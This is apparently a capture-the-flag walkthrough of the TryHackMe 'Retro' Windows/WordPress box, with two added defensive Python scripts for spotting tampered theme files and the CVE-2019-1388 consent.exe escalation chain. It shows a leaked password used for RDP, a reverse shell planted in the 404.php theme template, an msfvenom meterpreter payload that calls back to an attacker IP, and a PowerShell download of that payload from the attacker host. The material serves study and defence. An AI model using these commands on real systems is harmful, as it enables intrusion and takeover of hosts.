Disclaimer

The host tested in this article was properly authorized. The tools and methods used here are for learning and exchange only; do not use the tools or the approach described in this article for any illegal purpose. I accept no responsibility for any consequences and am not liable for any misuse or damage caused.

Service discovery

┌──(root㉿kali)-[~/tryhackme]
└─# nmap -sV -Pn 10.10.10.216
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 05:03 EDT
Nmap scan report for 10.10.10.216
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.16 seconds

Only two ports are open: 80 (HTTP) and 3389

Directory brute force

┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.216/_21-11-05_05-03-57.txt

Error Log: /root/dirsearch/logs/errors-21-11-05_05-03-57.log

Target: http://10.10.10.216/

[05:03:57] Starting:
[05:04:35] 301 -  150B  - /retro  ->  http://10.10.10.216/retro/

The scan turned up one directory; browsing it shows a WordPress site.
Enumeration now runs on two tracks: keep brute-forcing this directory, and run wpscan to enumerate the WordPress install.

WordPress directory brute force

┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216/retro

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.216/-retro_21-11-05_05-08-12.txt

Error Log: /root/dirsearch/logs/errors-21-11-05_05-08-12.log

Target: http://10.10.10.216/retro/

[05:08:14] Starting:
[05:08:21] 301 -  161B  - /retro/wp-content  ->  http://10.10.10.216/retro/wp-content/
[05:08:24] 301 -  162B  - /retro/wp-includes  ->  http://10.10.10.216/retro/wp-includes/
[05:09:04] 301 -  159B  - /retro/wp-admin  ->  http://10.10.10.216/retro/wp-admin/

Three folders were found, directory listing is not enabled, and nothing looks usable so far

WordPress information enumeration

The WordPress version is confirmed as 5.2.1

└─# wpscan --url http://10.10.10.216/retro
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.216/retro/ [10.10.10.216]
[+] Started: Fri Nov  5 05:09:28 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.216/retro/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.10.216/retro/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.216/retro/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.216/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.10.216/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>

[+] WordPress theme in use: 90s-retro
 | Location: http://10.10.10.216/retro/wp-content/themes/90s-retro/
 | Latest Version: 1.4.10 (up to date)
 | Last Updated: 2019-04-15T00:00:00.000Z
 | Readme: http://10.10.10.216/retro/wp-content/themes/90s-retro/readme.txt
 | Style URL: http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
 | Style Name: 90s Retro
 | Style URI: https://organicthemes.com/retro-theme/
 | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
 | Author: Organic Themes
 | Author URI: https://organicthemes.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4.10 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:12 <==================================> (137 / 137) 100.00% Time: 00:00:12

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Nov  5 05:10:05 2021
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 44.025 KB
[+] Data Received: 221.001 KB
[+] Memory used: 210.141 MB
[+] Elapsed time: 00:00:36

Search Kali's local exploit database for this WordPress version

The results list a SQL injection

┌──(root㉿kali)-[~]
└─# searchsploit WordPress 5.2.1
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts  | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                  | php/dos/47800.py
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities      | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                | php/webapps/44943.txt
WordPress Plugin Link Library 5.2.1 - SQL Injection                      | php/webapps/17887.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection              | php/webapps/48918.sh
------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Reading the entry, the injection is in a plugin, but testing shows this WordPress install does not have that plugin, and wpscan did not detect it either

On the home page the post author is named wade; trying to log in to WordPress with that account gives the message

ERROR: The password you entered for the username wade is incorrect.

This confirms that the account wade does exist

Enumerating usernames with wpscan also confirms that wade / Wade exist

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:01:07 <==================================> (200 / 200) 100.00% Time: 00:01:07

[i] User(s) Identified:

[+] wade
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.216/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Wade
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

The hint for user.txt is:

Don't leave sensitive information out in the open, even if you think you have control over it.

We assume the author discussed something related to his password in public, perhaps hidden in a blog post

One of the posts seems to leak some information

Ready Player One
by Wade

I can't believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it's because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I'll eventually get it down. Either way, I'm really excited to see this movie!

Ready Player One is the film of the same name.

At least we now know that the author tends to mix up his own name with the character's, and the film's protagonist is named Wade

In the comments under this post, the author leaked his own password, parzival:

Wade
December 9, 2019

Leaving myself a note here just in case I forget how to spell it: parzival

Initial shell

Since the system exposes 3389, RDP to the target as wade:parzival and collect user.txt

xfreerdp /u:wade /v:10.10.10.216

The same credentials also log in to WordPress.
The usual WordPress routine: once you have an administrator login, go to Appearance -> Theme Editor and edit the theme source

I generally write the webshell into the 404.php template, then request a nonexistent page on the front end to trigger the reverse shell

Writing a Windows reverse shell into 404.php gives us a webshell

┌──(root㉿kali)-[~/tryhackme]
└─# nc -nlvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.10.216] 49792
SOCKET: Shell has connected! PID: 3436
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\retro>whoami
iis apppool\retro
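From the defender's side, the Theme Editor step above leaves two things to check on a WordPress host: whether the in-dashboard editor is disabled at all (the DISALLOW_FILE_EDIT constant in wp-config.php), and whether any theme template already carries code it should not. The following Python script is an added example, not code from this writeup or from WordPress; the indicator list and the constructed sample theme (a stock-looking index.php beside a tampered 404.php whose loader carries a placeholder string instead of a payload) are the example's own assumptions.

```python
import os
import re
import tempfile
from typing import Dict, List

# PHP calls a theme template such as 404.php has no business making. The list is
# this example's own choice of indicators; tune it to the themes you actually run.
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|proc_open|popen|fsockopen"
    r"|base64_decode|gzinflate|str_rot13)\s*\(",
    re.IGNORECASE,
)


def scan_php_source(source: str) -> List[str]:
    """Return the sorted, de-duplicated suspicious call names found in one PHP source."""
    return sorted({m.group(1).lower() for m in SUSPICIOUS_CALLS.finditer(source)})


def scan_theme_dir(theme_dir: str) -> Dict[str, List[str]]:
    """Walk a theme directory and map each flagged .php file (relative path) to its hits."""
    findings: Dict[str, List[str]] = {}
    for root, _dirs, files in os.walk(theme_dir):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                findings[os.path.relpath(path, theme_dir).replace(os.sep, "/")] = hits
    return findings


def file_edit_disabled(wp_config_source: str) -> bool:
    """True when wp-config.php defines DISALLOW_FILE_EDIT as true, which removes the
    Appearance -> Theme Editor route from the dashboard."""
    m = re.search(
        r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*(true|false)\s*\)",
        wp_config_source,
        re.IGNORECASE,
    )
    return m is not None and m.group(1).lower() == "true"


# Constructed sample theme files (not from the 90s-retro theme): a clean index.php
# and a 404.php with an obfuscated loader whose argument is only a placeholder.
CLEAN_INDEX = "<?php get_header(); ?>\n<main><?php the_content(); ?></main>\n<?php get_footer(); ?>\n"
TAMPERED_404 = (
    "<?php get_header(); ?>\n"
    "<h1><?php esc_html_e('Page not found', '90s-retro'); ?></h1>\n"
    "<?php eval(base64_decode('PLACEHOLDER_NOT_A_REAL_PAYLOAD')); ?>\n"
    "<?php get_footer(); ?>\n"
)


def demo_scan() -> Dict[str, List[str]]:
    """Write the constructed theme into a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "index.php"), "w", encoding="utf-8") as fh:
            fh.write(CLEAN_INDEX)
        with open(os.path.join(tmp, "404.php"), "w", encoding="utf-8") as fh:
            fh.write(TAMPERED_404)
        return scan_theme_dir(tmp)


if __name__ == "__main__":
    for path, hits in demo_scan().items():
        print(f"{path}: {', '.join(hits)}")
    print("theme editor disabled:", file_edit_disabled("define('DISALLOW_FILE_EDIT', true);"))
```

Run against a real install, point scan_theme_dir at wp-content/themes/<theme> and feed file_edit_disabled the contents of wp-config.php; a hit on 404.php, which a stock theme renders with nothing but template tags, is worth comparing against the theme's pristine copy. The regex is a triage filter, not a full PHP parser, so treat its output as a list of files to read rather than a verdict.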

Generate a more stable shell with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 -f exe > shell_64.exe

Upload it to the target through the webshell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.13.21.169:8000/shel...','C:\users\public\Downloads\shell_64.exe')"

Also download nc and wget to the target for later use; C:\users\public\Downloads was confirmed writable:

In the RDP session, run shell_64.exe as wade, and a reverse shell running as wade comes back

msf6 exploit(windows/local/bypassuac_sdclt) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.13.21.169:4444
[*] Sending stage (200262 bytes) to 10.10.10.216
[*] Meterpreter session 3 opened (10.13.21.169:4444 -> 10.10.10.216:50582) at 2021-11-22 05:48:04 -0500

meterpreter > getuid
Server username: RETROWEB\Wade

Privilege escalation

The hint for privilege escalation is:

Figure out what the user last was trying to find. Otherwise, put this one on ice and get yourself a better shell, perhaps one dipped in venom.

At first I thought this meant looking through the cmd or PowerShell command history, but that turned up nothing. It was the browser history: the author left a hint pointing to CVE-2019-1388

I found the privilege escalation script on GitHub.

The explanation on GitHub is brief; I followed a more detailed article on how the vulnerability works and escalated to SYSTEM

In short, the escalation mechanism is this passage from the article:

When the OID is a hyperlink, clicking the link makes consent.exe open a browser with SYSTEM privileges to visit it, so that browser now runs as SYSTEM. Saving the page pops up Windows Explorer; right-clicking in Explorer to open cmd.exe inherits the browser's SYSTEM privileges, and that completes the escalation from an ordinary user to NT AUTHORITY\SYSTEM!
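The chain the article describes leaves a distinctive process-tree footprint: consent.exe, which runs as SYSTEM, normally never starts a browser, and a cmd.exe that runs as SYSTEM but whose ancestry passes through that browser is the escalation itself. The script below is an added detection example, not code from the writeup, the GitHub script or the quoted article; it runs the two-stage check over a constructed list of process-creation records (one escalation chain beside a benign user session). The ProcEvent field names are the example's own simplification of what a Sysmon Event ID 1 or Windows 4688 feed provides, and the browser and shell name sets are assumptions to adjust for your environment.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

SYSTEM_USER = "NT AUTHORITY\\SYSTEM"
# Assumed image names; extend for the browsers and shells present on your hosts.
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (this example's own schema, not Sysmon's)."""
    pid: int
    ppid: int
    image: str  # full path or bare name of the started executable
    user: str   # account the new process runs as


def basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerating either separator."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def descends_from(ev: ProcEvent, ancestors: Set[int], by_pid: Dict[int, ProcEvent]) -> bool:
    """Walk the parent chain of ev; True if any ancestor pid is in `ancestors`.
    The `seen` set guards against pid reuse producing a cycle in the records."""
    seen: Set[int] = set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        if cur.pid in ancestors:
            return True
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return False


def detect_consent_chain(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for each process matching the chain in the quoted text:
    stage 1, a browser created by consent.exe and running as SYSTEM;
    stage 2, a shell running as SYSTEM whose ancestry passes through such a
    browser (the browser -> Explorer -> cmd.exe hop)."""
    by_pid = {e.pid: e for e in events}
    alerts: List[Tuple[int, str]] = []
    system_browsers: Set[int] = set()
    for e in events:
        parent = by_pid.get(e.ppid)
        if (parent is not None and basename(parent.image) == "consent.exe"
                and basename(e.image) in BROWSERS and e.user == SYSTEM_USER):
            system_browsers.add(e.pid)
            alerts.append((e.pid, f"{basename(e.image)} started by consent.exe as SYSTEM"))
    for e in events:
        if (basename(e.image) in SHELLS and e.user == SYSTEM_USER
                and descends_from(e, system_browsers, by_pid)):
            alerts.append((e.pid, f"{basename(e.image)} as SYSTEM descends from a consent-launched browser"))
    return alerts


def sample_events() -> List[ProcEvent]:
    """Constructed sample records: one escalation chain and one benign user session."""
    return [
        ProcEvent(300, 1, r"C:\Windows\System32\svchost.exe", SYSTEM_USER),
        ProcEvent(400, 300, r"C:\Windows\System32\consent.exe", SYSTEM_USER),
        ProcEvent(500, 400, r"C:\Program Files\Internet Explorer\iexplore.exe", SYSTEM_USER),
        ProcEvent(600, 500, r"C:\Windows\explorer.exe", SYSTEM_USER),
        ProcEvent(700, 600, r"C:\Windows\System32\cmd.exe", SYSTEM_USER),
        # Benign: the logged-on user's own browser and shell under their Explorer.
        ProcEvent(900, 1, r"C:\Windows\explorer.exe", "RETROWEB\\Wade"),
        ProcEvent(910, 900, r"C:\Program Files\Internet Explorer\iexplore.exe", "RETROWEB\\Wade"),
        ProcEvent(920, 900, r"C:\Windows\System32\cmd.exe", "RETROWEB\\Wade"),
    ]


if __name__ == "__main__":
    for pid, reason in detect_consent_chain(sample_events()):
        print(pid, reason)
```

Stage 1 alone is the high-signal rule (a browser whose parent is consent.exe is already abnormal); stage 2 tells you whether the escalation was completed. Detection is the complement to the actual fix, which is the Windows update Microsoft shipped for CVE-2019-1388 in November 2019.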

root.txt is on the Administrator desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 7443-948C

 Directory of C:\Users\Administrator\Desktop

12/08/2019  08:06 PM    <DIR>          .
12/08/2019  08:06 PM    <DIR>          ..
12/08/2019  08:08 PM                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,362,959,872 bytes free